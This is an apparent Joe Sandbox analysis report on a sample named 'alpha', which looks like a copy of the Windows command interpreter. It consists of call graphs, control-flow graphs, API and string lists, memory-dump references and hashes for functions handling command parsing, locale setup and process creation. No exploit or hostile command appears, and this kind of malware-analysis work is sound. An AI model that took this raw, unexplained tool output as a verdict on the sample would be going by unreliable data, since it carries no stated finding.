7ff6a0e77348 168 API calls 20884->20885 20886 7ff6a0e948ad 20885->20886 20887 7ff6a0e77348 168 API calls 20886->20887 20888 7ff6a0e948be 20887->20888 20888->20841 16736 7ff6a0e88d80 16737 7ff6a0e88da4 16736->16737 16738 7ff6a0e88db6 16737->16738 16739 7ff6a0e88dbf Sleep 16737->16739 16740 7ff6a0e88ddb _amsg_exit 16738->16740 16742 7ff6a0e88de7 16738->16742 16739->16737 16740->16742 16741 7ff6a0e88e56 _initterm 16744 7ff6a0e88e73 _IsNonwritableInCurrentImage 16741->16744 16742->16741 16743 7ff6a0e88e3c 16742->16743 16742->16744 16750 7ff6a0e837d8 GetCurrentThreadId OpenThread 16744->16750 16783 7ff6a0e804f4 16750->16783 16752 7ff6a0e83839 HeapSetInformation RegOpenKeyExW 16753 7ff6a0e8388d 16752->16753 16754 7ff6a0e8e9f8 RegQueryValueExW RegCloseKey 16752->16754 16755 7ff6a0e85920 VirtualQuery VirtualQuery 16753->16755 16757 7ff6a0e8ea41 GetThreadLocale 16754->16757 16756 7ff6a0e838ab GetConsoleOutputCP GetCPInfo 16755->16756 16756->16757 16758 7ff6a0e838f1 memset 16756->16758 16769 7ff6a0e83919 16757->16769 16758->16769 16759 7ff6a0e84d5c 391 API calls 16759->16769 16760 7ff6a0e83948 _setjmp 16760->16769 16761 7ff6a0e8eb27 _setjmp 16761->16769 16762 7ff6a0e98530 370 API calls 16762->16769 16763 7ff6a0e801b8 6 API calls 16763->16769 16764 7ff6a0e73240 166 API calls 16764->16769 16765 7ff6a0e84c1c 166 API calls 16765->16769 16766 7ff6a0e8eb71 _setmode 16766->16769 16767 7ff6a0e886f0 182 API calls 16767->16769 16768 7ff6a0e80580 12 API calls 16770 7ff6a0e8398b GetConsoleOutputCP GetCPInfo 16768->16770 16769->16754 16769->16759 16769->16760 16769->16761 16769->16762 16769->16763 16769->16764 16769->16765 16769->16766 16769->16767 16769->16768 16771 7ff6a0e858e4 EnterCriticalSection LeaveCriticalSection 16769->16771 16773 7ff6a0e7be00 647 API calls 16769->16773 16774 7ff6a0e7df60 481 API calls 16769->16774 16775 7ff6a0e858e4 EnterCriticalSection LeaveCriticalSection 16769->16775 16772 7ff6a0e804f4 GetModuleHandleW GetProcAddress SetThreadLocale 16770->16772 16771->16769 16772->16769 16773->16769 16774->16769 16776 7ff6a0e8ebbe GetConsoleOutputCP GetCPInfo 16775->16776 16777 7ff6a0e804f4 GetModuleHandleW GetProcAddress SetThreadLocale 16776->16777 16778 7ff6a0e8ebe6 16777->16778 16779 7ff6a0e7be00 647 API calls 16778->16779 16780 7ff6a0e80580 12 API calls 16778->16780 16779->16778 16781 7ff6a0e8ebfc GetConsoleOutputCP GetCPInfo 16780->16781 16782 7ff6a0e804f4 GetModuleHandleW GetProcAddress SetThreadLocale 16781->16782 16782->16769 16785 7ff6a0e80504 16783->16785 16784 7ff6a0e8051e GetModuleHandleW 16784->16785 16785->16784 16786 7ff6a0e8054d GetProcAddress 16785->16786 16787 7ff6a0e8056c SetThreadLocale 16785->16787 16786->16785

                                                                                          Executed Functions

                                                                                          Function 00007FF6A0E80A6C Relevance: 53.1, APIs: 23, Strings: 7, Instructions: 605COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                                                                                          • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
                                                                                          • API String ID: 3305344409-4288247545
                                                                                          • Opcode ID: 166bda4b5940304c979f579b0b8d98b14fe3377e806c59b456309fb1df77ae39
                                                                                          • Instruction ID: 4efeee771ca3bf04461ab87d733f6921306c89df7626f763dbba8c621a623b9f
                                                                                          • Opcode Fuzzy Hash: 166bda4b5940304c979f579b0b8d98b14fe3377e806c59b456309fb1df77ae39
                                                                                          • Instruction Fuzzy Hash: 6D42E131A0F783A6EB648B2198442BA67A1FF89B95F144234DD1ECB7D5DF3CE448A340
                                                                                          Function 00007FF6A0E7AA54 Relevance: 51.3, APIs: 24, Strings: 5, Instructions: 536COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 216 7ff6a0e7aa54-7ff6a0e7aa98 call 7ff6a0e7cd90 219 7ff6a0e8bf5a-7ff6a0e8bf70 call 7ff6a0e84c1c call 7ff6a0e7ff70 216->219 220 7ff6a0e7aa9e 216->220 221 7ff6a0e7aaa5-7ff6a0e7aaa8 220->221 223 7ff6a0e7acde-7ff6a0e7ad00 221->223 224 7ff6a0e7aaae-7ff6a0e7aac8 wcschr 221->224 229 7ff6a0e7ad06 223->229 224->223 226 7ff6a0e7aace-7ff6a0e7aae9 towlower 224->226 226->223 228 7ff6a0e7aaef-7ff6a0e7aaf3 226->228 231 7ff6a0e7aaf9-7ff6a0e7aafd 228->231 232 7ff6a0e8beb7-7ff6a0e8bec4 call 7ff6a0e9eaf0 228->232 233 7ff6a0e7ad0d-7ff6a0e7ad1f 229->233 235 7ff6a0e8bbcf 231->235 236 7ff6a0e7ab03-7ff6a0e7ab07 231->236 248 7ff6a0e8bf43-7ff6a0e8bf59 call 7ff6a0e84c1c 232->248 249 7ff6a0e8bec6-7ff6a0e8bed8 call 7ff6a0e73240 232->249 237 7ff6a0e7ad22-7ff6a0e7ad2a call 7ff6a0e813e0 233->237 243 7ff6a0e8bbde 235->243 239 7ff6a0e7ab7d-7ff6a0e7ab81 236->239 240 7ff6a0e7ab09-7ff6a0e7ab0d 236->240 237->221 244 7ff6a0e8be63 239->244 245 7ff6a0e7ab87-7ff6a0e7ab95 239->245 240->244 246 7ff6a0e7ab13-7ff6a0e7ab17 240->246 256 7ff6a0e8bbea-7ff6a0e8bbec 243->256 259 7ff6a0e8be72-7ff6a0e8be88 call 7ff6a0e73278 call 7ff6a0e84c1c 244->259 251 7ff6a0e7ab98-7ff6a0e7aba0 245->251 246->239 252 7ff6a0e7ab19-7ff6a0e7ab1d 246->252 248->219 249->248 260 7ff6a0e8beda-7ff6a0e8bee9 call 7ff6a0e73240 249->260 251->251 257 7ff6a0e7aba2-7ff6a0e7abb3 call 7ff6a0e7cd90 251->257 252->243 258 7ff6a0e7ab23-7ff6a0e7ab27 252->258 265 7ff6a0e8bbf8-7ff6a0e8bc01 256->265 257->219 271 7ff6a0e7abb9-7ff6a0e7abde call 7ff6a0e813e0 call 7ff6a0e833a8 257->271 258->256 262 7ff6a0e7ab2d-7ff6a0e7ab31 258->262 281 7ff6a0e8be89-7ff6a0e8be8c 259->281 274 7ff6a0e8bef3-7ff6a0e8bef9 260->274 275 7ff6a0e8beeb-7ff6a0e8bef1 260->275 262->229 267 7ff6a0e7ab37-7ff6a0e7ab3b 262->267 265->233 267->265 272 7ff6a0e7ab41-7ff6a0e7ab45 267->272 311 7ff6a0e7ac75 271->311 312 7ff6a0e7abe4-7ff6a0e7abe7 271->312 277 7ff6a0e7ab4b-7ff6a0e7ab4f 272->277 278 7ff6a0e8bc06-7ff6a0e8bc2a call 7ff6a0e813e0 272->278 274->248 282 7ff6a0e8befb-7ff6a0e8bf0d call 7ff6a0e73240 274->282 275->248 275->274 279 7ff6a0e7ab55-7ff6a0e7ab78 call 7ff6a0e813e0 277->279 280 7ff6a0e7ad2f-7ff6a0e7ad33 277->280 298 7ff6a0e8bc5a-7ff6a0e8bc61 278->298 299 7ff6a0e8bc2c-7ff6a0e8bc4c _wcsnicmp 278->299 279->221 290 7ff6a0e7ad39-7ff6a0e7ad3d 280->290 291 7ff6a0e8bc66-7ff6a0e8bc8a call 7ff6a0e813e0 280->291 286 7ff6a0e8be92-7ff6a0e8beaa call 7ff6a0e73278 call 7ff6a0e84c1c 281->286 287 7ff6a0e7acbe 281->287 282->248 307 7ff6a0e8bf0f-7ff6a0e8bf21 call 7ff6a0e73240 282->307 340 7ff6a0e8beab-7ff6a0e8beb6 call 7ff6a0e84c1c 286->340 295 7ff6a0e7acc0-7ff6a0e7acc7 287->295 300 7ff6a0e8bcde-7ff6a0e8bd02 call 7ff6a0e813e0 290->300 301 7ff6a0e7ad43-7ff6a0e7ad49 290->301 314 7ff6a0e8bcc4-7ff6a0e8bcdc 291->314 315 7ff6a0e8bc8c-7ff6a0e8bcaa _wcsnicmp 291->315 295->295 304 7ff6a0e7acc9-7ff6a0e7acda 295->304 313 7ff6a0e8bd31-7ff6a0e8bd4f _wcsnicmp 298->313 299->298 308 7ff6a0e8bc4e-7ff6a0e8bc55 299->308 332 7ff6a0e8bd04-7ff6a0e8bd24 _wcsnicmp 300->332 333 7ff6a0e8bd2a 300->333 309 7ff6a0e8bd5e-7ff6a0e8bd65 301->309 310 7ff6a0e7ad4f-7ff6a0e7ad68 301->310 304->223 307->248 342 7ff6a0e8bf23-7ff6a0e8bf35 call 7ff6a0e73240 307->342 322 7ff6a0e8bbb3-7ff6a0e8bbb7 308->322 309->310 323 7ff6a0e8bd6b-7ff6a0e8bd73 309->323 324 7ff6a0e7ad6d-7ff6a0e7ad70 310->324 325 7ff6a0e7ad6a 310->325 319 7ff6a0e7ac77-7ff6a0e7ac7f 311->319 312->287 326 7ff6a0e7abed-7ff6a0e7ac0b call 7ff6a0e7cd90 * 2 312->326 320 7ff6a0e8bbc2-7ff6a0e8bbca 313->320 321 7ff6a0e8bd55 313->321 314->313 315->314 330 7ff6a0e8bcac-7ff6a0e8bcbf 315->330 319->287 329 7ff6a0e7ac81-7ff6a0e7ac85 319->329 320->221 321->309 334 7ff6a0e8bbba-7ff6a0e8bbbd call 7ff6a0e813e0 322->334 335 7ff6a0e8bd79-7ff6a0e8bd8b iswxdigit 323->335 336 7ff6a0e8be4a-7ff6a0e8be5e 323->336 324->237 325->324 326->340 356 7ff6a0e7ac11-7ff6a0e7ac14 326->356 343 7ff6a0e7ac88-7ff6a0e7ac8f 329->343 330->322 332->333 341 7ff6a0e8bbac 332->341 333->313 334->320 335->336 338 7ff6a0e8bd91-7ff6a0e8bda3 iswxdigit 335->338 336->334 338->336 344 7ff6a0e8bda9-7ff6a0e8bdbb iswxdigit 338->344 340->232 341->322 342->248 357 7ff6a0e8bf37-7ff6a0e8bf3e call 7ff6a0e73240 342->357 343->343 347 7ff6a0e7ac91-7ff6a0e7ac94 343->347 344->336 349 7ff6a0e8bdc1-7ff6a0e8bdd7 iswdigit 344->349 347->287 353 7ff6a0e7ac96-7ff6a0e7acaa wcsrchr 347->353 354 7ff6a0e8bddf-7ff6a0e8bdeb towlower 349->354 355 7ff6a0e8bdd9-7ff6a0e8bddd 349->355 353->287 358 7ff6a0e7acac-7ff6a0e7acb9 call 7ff6a0e81300 353->358 361 7ff6a0e8bdee-7ff6a0e8be0f iswdigit 354->361 355->361 356->340 362 7ff6a0e7ac1a-7ff6a0e7ac33 memset 356->362 357->248 358->287 363 7ff6a0e8be11-7ff6a0e8be15 361->363 364 7ff6a0e8be17-7ff6a0e8be23 towlower 361->364 362->311 365 7ff6a0e7ac35-7ff6a0e7ac4b wcschr 362->365 366 7ff6a0e8be26-7ff6a0e8be45 call 7ff6a0e813e0 363->366 364->366 365->311 367 7ff6a0e7ac4d-7ff6a0e7ac54 365->367 366->336 368 7ff6a0e7ac5a-7ff6a0e7ac6f wcschr 367->368 369 7ff6a0e7ad72-7ff6a0e7ad91 wcschr 367->369 368->311 368->369 371 7ff6a0e7ad97-7ff6a0e7adac wcschr 369->371 372 7ff6a0e7af03-7ff6a0e7af07 369->372 371->372 373 7ff6a0e7adb2-7ff6a0e7adc7 wcschr 371->373 372->311 373->372 374 7ff6a0e7adcd-7ff6a0e7ade2 wcschr 373->374 374->372 375 7ff6a0e7ade8-7ff6a0e7adfd wcschr 374->375 375->372 376 7ff6a0e7ae03-7ff6a0e7ae18 wcschr 375->376 376->372 377 7ff6a0e7ae1e-7ff6a0e7ae21 376->377 378 7ff6a0e7ae24-7ff6a0e7ae27 377->378 378->372 379 7ff6a0e7ae2d-7ff6a0e7ae40 iswspace 378->379 380 7ff6a0e7ae4b-7ff6a0e7ae5e 379->380 381 7ff6a0e7ae42-7ff6a0e7ae49 379->381 382 7ff6a0e7ae66-7ff6a0e7ae6d 380->382 381->378 382->382 383 7ff6a0e7ae6f-7ff6a0e7ae77 382->383 383->259 384 7ff6a0e7ae7d-7ff6a0e7ae97 call 7ff6a0e813e0 383->384 387 7ff6a0e7ae9a-7ff6a0e7aea4 384->387 388 7ff6a0e7aebc-7ff6a0e7aef8 call 7ff6a0e80a6c call 7ff6a0e7ff70 * 2 387->388 389 7ff6a0e7aea6-7ff6a0e7aead 387->389 388->319 397 7ff6a0e7aefe 388->397 389->388 390 7ff6a0e7aeaf-7ff6a0e7aeba 389->390 390->387 390->388 397->281
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
                                                                                          • String ID: :$:$:$:ON$OFF
                                                                                          • API String ID: 972821348-467788257
                                                                                          • Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                          • Instruction ID: 81274820d7ba85c82bf1157e7764d68989332536d476beac4afca0a57bf362ff
                                                                                          • Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                          • Instruction Fuzzy Hash: 1022B631F0B643B6FB649F2199142B9A6A1FF89B81F498035DA0EC7795DF3CA844E350
                                                                                          Function 00007FF6A0E851EC Relevance: 45.9, APIs: 15, Strings: 11, Instructions: 384COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 398 7ff6a0e851ec-7ff6a0e85248 call 7ff6a0e85508 GetLocaleInfoW 401 7ff6a0e8ef32-7ff6a0e8ef3c 398->401 402 7ff6a0e8524e-7ff6a0e85272 GetLocaleInfoW 398->402 405 7ff6a0e8ef3f-7ff6a0e8ef49 401->405 403 7ff6a0e85295-7ff6a0e852b9 GetLocaleInfoW 402->403 404 7ff6a0e85274-7ff6a0e8527a 402->404 408 7ff6a0e852bb-7ff6a0e852c3 403->408 409 7ff6a0e852de-7ff6a0e85305 GetLocaleInfoW 403->409 406 7ff6a0e854f7-7ff6a0e854f9 404->406 407 7ff6a0e85280-7ff6a0e85286 404->407 410 7ff6a0e8ef61-7ff6a0e8ef6c 405->410 411 7ff6a0e8ef4b-7ff6a0e8ef52 405->411 406->401 407->406 412 7ff6a0e8528c-7ff6a0e8528f 407->412 413 7ff6a0e852c9-7ff6a0e852d7 408->413 414 7ff6a0e8ef75-7ff6a0e8ef78 408->414 415 7ff6a0e85307-7ff6a0e8531b 409->415 416 7ff6a0e85321-7ff6a0e85343 GetLocaleInfoW 409->416 410->414 411->410 417 7ff6a0e8ef54-7ff6a0e8ef5f 411->417 412->403 413->409 418 7ff6a0e8ef99-7ff6a0e8efa3 414->418 419 7ff6a0e8ef7a-7ff6a0e8ef7d 414->419 415->416 420 7ff6a0e8efaf-7ff6a0e8efb9 416->420 421 7ff6a0e85349-7ff6a0e8536e GetLocaleInfoW 416->421 417->405 417->410 418->420 419->409 422 7ff6a0e8ef83-7ff6a0e8ef8d 419->422 423 7ff6a0e8efbc-7ff6a0e8efc6 420->423 424 7ff6a0e8eff2-7ff6a0e8effc 421->424 425 7ff6a0e85374-7ff6a0e85396 GetLocaleInfoW 421->425 422->418 426 7ff6a0e8efde-7ff6a0e8efe9 423->426 427 7ff6a0e8efc8-7ff6a0e8efcf 423->427 428 7ff6a0e8efff-7ff6a0e8f009 424->428 429 7ff6a0e8539c-7ff6a0e853be GetLocaleInfoW 425->429 430 7ff6a0e8f035-7ff6a0e8f03f 425->430 426->424 427->426 432 7ff6a0e8efd1-7ff6a0e8efdc 427->432 433 7ff6a0e8f021-7ff6a0e8f02c 428->433 434 7ff6a0e8f00b-7ff6a0e8f012 428->434 435 7ff6a0e853c4-7ff6a0e853e6 GetLocaleInfoW 429->435 436 7ff6a0e8f078-7ff6a0e8f082 429->436 431 7ff6a0e8f042-7ff6a0e8f04c 430->431 439 7ff6a0e8f04e-7ff6a0e8f055 431->439 440 7ff6a0e8f064-7ff6a0e8f06f 431->440 432->423 432->426 433->430 434->433 442 7ff6a0e8f014-7ff6a0e8f01f 434->442 437 7ff6a0e853ec-7ff6a0e8540e GetLocaleInfoW 435->437 438 7ff6a0e8f0bb-7ff6a0e8f0c5 435->438 441 7ff6a0e8f085-7ff6a0e8f08f 436->441 443 7ff6a0e8f0fe-7ff6a0e8f108 437->443 444 7ff6a0e85414-7ff6a0e85436 GetLocaleInfoW 437->444 448 7ff6a0e8f0c8-7ff6a0e8f0d2 438->448 439->440 445 7ff6a0e8f057-7ff6a0e8f062 439->445 440->436 446 7ff6a0e8f091-7ff6a0e8f098 441->446 447 7ff6a0e8f0a7-7ff6a0e8f0b2 441->447 442->428 442->433 453 7ff6a0e8f10b-7ff6a0e8f115 443->453 451 7ff6a0e8543c-7ff6a0e8545e GetLocaleInfoW 444->451 452 7ff6a0e8f141-7ff6a0e8f14b 444->452 445->431 445->440 446->447 454 7ff6a0e8f09a-7ff6a0e8f0a5 446->454 447->438 449 7ff6a0e8f0d4-7ff6a0e8f0db 448->449 450 7ff6a0e8f0ea-7ff6a0e8f0f5 448->450 449->450 455 7ff6a0e8f0dd-7ff6a0e8f0e8 449->455 450->443 456 7ff6a0e8f184-7ff6a0e8f18b 451->456 457 7ff6a0e85464-7ff6a0e85486 GetLocaleInfoW 451->457 460 7ff6a0e8f14e-7ff6a0e8f158 452->460 458 7ff6a0e8f117-7ff6a0e8f11e 453->458 459 7ff6a0e8f12d-7ff6a0e8f138 453->459 454->441 454->447 455->448 455->450 461 7ff6a0e8f18e-7ff6a0e8f198 456->461 462 7ff6a0e8548c-7ff6a0e854ae GetLocaleInfoW 457->462 463 7ff6a0e8f1c4-7ff6a0e8f1ce 457->463 458->459 464 7ff6a0e8f120-7ff6a0e8f12b 458->464 459->452 465 7ff6a0e8f170-7ff6a0e8f17b 460->465 466 7ff6a0e8f15a-7ff6a0e8f161 460->466 467 7ff6a0e8f1b0-7ff6a0e8f1bb 461->467 468 7ff6a0e8f19a-7ff6a0e8f1a1 461->468 469 7ff6a0e8f207-7ff6a0e8f20e 462->469 470 7ff6a0e854b4-7ff6a0e854f5 setlocale call 7ff6a0e88f80 462->470 471 7ff6a0e8f1d1-7ff6a0e8f1db 463->471 464->453 464->459 465->456 466->465 472 7ff6a0e8f163-7ff6a0e8f16e 466->472 467->463 468->467 473 7ff6a0e8f1a3-7ff6a0e8f1ae 468->473 477 7ff6a0e8f211-7ff6a0e8f21b 469->477 475 7ff6a0e8f1f3-7ff6a0e8f1fe 471->475 476 7ff6a0e8f1dd-7ff6a0e8f1e4 471->476 472->460 472->465 473->461 473->467 475->469 476->475 479 7ff6a0e8f1e6-7ff6a0e8f1f1 476->479 480 7ff6a0e8f233-7ff6a0e8f23e 477->480 481 7ff6a0e8f21d-7ff6a0e8f224 477->481 479->471 479->475 481->480 482 7ff6a0e8f226-7ff6a0e8f231 481->482 482->477 482->480
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoLocale$DefaultUsersetlocale
                                                                                          • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                                          • API String ID: 1351325837-2236139042
                                                                                          • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                          • Instruction ID: 7713900477f3f8d8e52751cdd624954ced5c50fbe5774ac975e413b007fd9b75
                                                                                          • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                          • Instruction Fuzzy Hash: 75F17C76B0A743A5EF218F11D9102B966E4FF49B81F944136CA0E977A4EF3CE919E300
                                                                                          Function 00007FF6A0E84224 Relevance: 45.8, APIs: 19, Strings: 7, Instructions: 328threadprocessstringCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 483 7ff6a0e84224-7ff6a0e842a5 InitializeProcThreadAttributeList 484 7ff6a0e842ab-7ff6a0e842e5 UpdateProcThreadAttribute 483->484 485 7ff6a0e8ecd4-7ff6a0e8ecee GetLastError call 7ff6a0e99eec 483->485 486 7ff6a0e8ecf0-7ff6a0e8ed19 GetLastError call 7ff6a0e99eec DeleteProcThreadAttributeList 484->486 487 7ff6a0e842eb-7ff6a0e843c6 memset * 2 GetStartupInfoW call 7ff6a0e83a90 call 7ff6a0e7b900 484->487 494 7ff6a0e8ed1e 485->494 486->494 497 7ff6a0e843cc-7ff6a0e843d3 487->497 498 7ff6a0e84638-7ff6a0e84644 _local_unwind 487->498 499 7ff6a0e84649-7ff6a0e84650 497->499 500 7ff6a0e843d9-7ff6a0e843dc 497->500 498->499 499->500 503 7ff6a0e84656-7ff6a0e8465d 499->503 501 7ff6a0e84415-7ff6a0e84424 call 7ff6a0e85a68 500->501 502 7ff6a0e843de-7ff6a0e843f5 wcsrchr 500->502 510 7ff6a0e8442a-7ff6a0e84486 CreateProcessW 501->510 511 7ff6a0e84589-7ff6a0e84590 501->511 502->501 504 7ff6a0e843f7-7ff6a0e8440f lstrcmpW 502->504 503->501 506 7ff6a0e84663 503->506 504->501 507 7ff6a0e84668-7ff6a0e8466d call 7ff6a0e99044 504->507 506->500 507->501 513 7ff6a0e8448b-7ff6a0e8448f 510->513 511->510 514 7ff6a0e84596-7ff6a0e845fa CreateProcessAsUserW 511->514 515 7ff6a0e84495-7ff6a0e844c7 CloseHandle call 7ff6a0e8498c 513->515 516 7ff6a0e84672-7ff6a0e84682 GetLastError 513->516 514->513 519 7ff6a0e8468d-7ff6a0e84694 515->519 520 7ff6a0e844cd-7ff6a0e844e5 515->520 516->519 521 7ff6a0e84696-7ff6a0e846a0 519->521 522 7ff6a0e846a2-7ff6a0e846ac 519->522 523 7ff6a0e844eb-7ff6a0e844f2 520->523 524 7ff6a0e847a3-7ff6a0e847a9 520->524 521->522 525 7ff6a0e846ae-7ff6a0e846b5 call 7ff6a0e897bc 521->525 522->525 526 7ff6a0e84705-7ff6a0e84707 522->526 527 7ff6a0e844f8-7ff6a0e84507 523->527 528 7ff6a0e845ff-7ff6a0e84607 523->528 541 7ff6a0e846b7-7ff6a0e84701 call 7ff6a0ecc038 525->541 542 7ff6a0e84703 525->542 526->520 530 7ff6a0e8470d-7ff6a0e8472a call 7ff6a0e7cd90 526->530 531 7ff6a0e8450d-7ff6a0e84512 call 7ff6a0e85cb4 527->531 532 7ff6a0e84612-7ff6a0e84616 527->532 528->527 533 7ff6a0e8460d 528->533 543 7ff6a0e8473d-7ff6a0e84767 call 7ff6a0e813e0 call 7ff6a0e99eec call 7ff6a0e7ff70 _local_unwind 530->543 544 7ff6a0e8472c-7ff6a0e84738 _local_unwind 530->544 547 7ff6a0e84517-7ff6a0e8455e call 7ff6a0e833f0 call 7ff6a0e8498c 531->547 539 7ff6a0e8461c-7ff6a0e84633 532->539 540 7ff6a0e847d7-7ff6a0e847df 532->540 538 7ff6a0e8476c-7ff6a0e84773 533->538 538->527 548 7ff6a0e84779-7ff6a0e84780 538->548 545 7ff6a0e847f2-7ff6a0e8483c call 7ff6a0e7ff70 DeleteProcThreadAttributeList call 7ff6a0e88f80 539->545 540->545 546 7ff6a0e847e1-7ff6a0e847ed CloseHandle 540->546 541->526 542->526 543->538 544->543 546->545 568 7ff6a0e84564-7ff6a0e84579 call 7ff6a0e8498c 547->568 569 7ff6a0e847ae-7ff6a0e847ca call 7ff6a0e833f0 547->569 548->527 553 7ff6a0e84786-7ff6a0e84789 548->553 553->527 558 7ff6a0e8478f-7ff6a0e84792 553->558 558->524 562 7ff6a0e84794-7ff6a0e8479d call 7ff6a0e9a250 558->562 562->524 562->527 568->545 576 7ff6a0e8457f-7ff6a0e84584 call 7ff6a0e9a920 568->576 569->540 576->545
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                                                                          • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                                                                                          • API String ID: 388421343-2905461000
                                                                                          • Opcode ID: a39f4a529f52f64395c69d74f8e47fafd60531de1d64f261e5ad8184ef12a4c8
                                                                                          • Instruction ID: 255a05a14fb6cb33d52738a41380a037e367046f06414d7f9ce9ad700b134595
                                                                                          • Opcode Fuzzy Hash: a39f4a529f52f64395c69d74f8e47fafd60531de1d64f261e5ad8184ef12a4c8
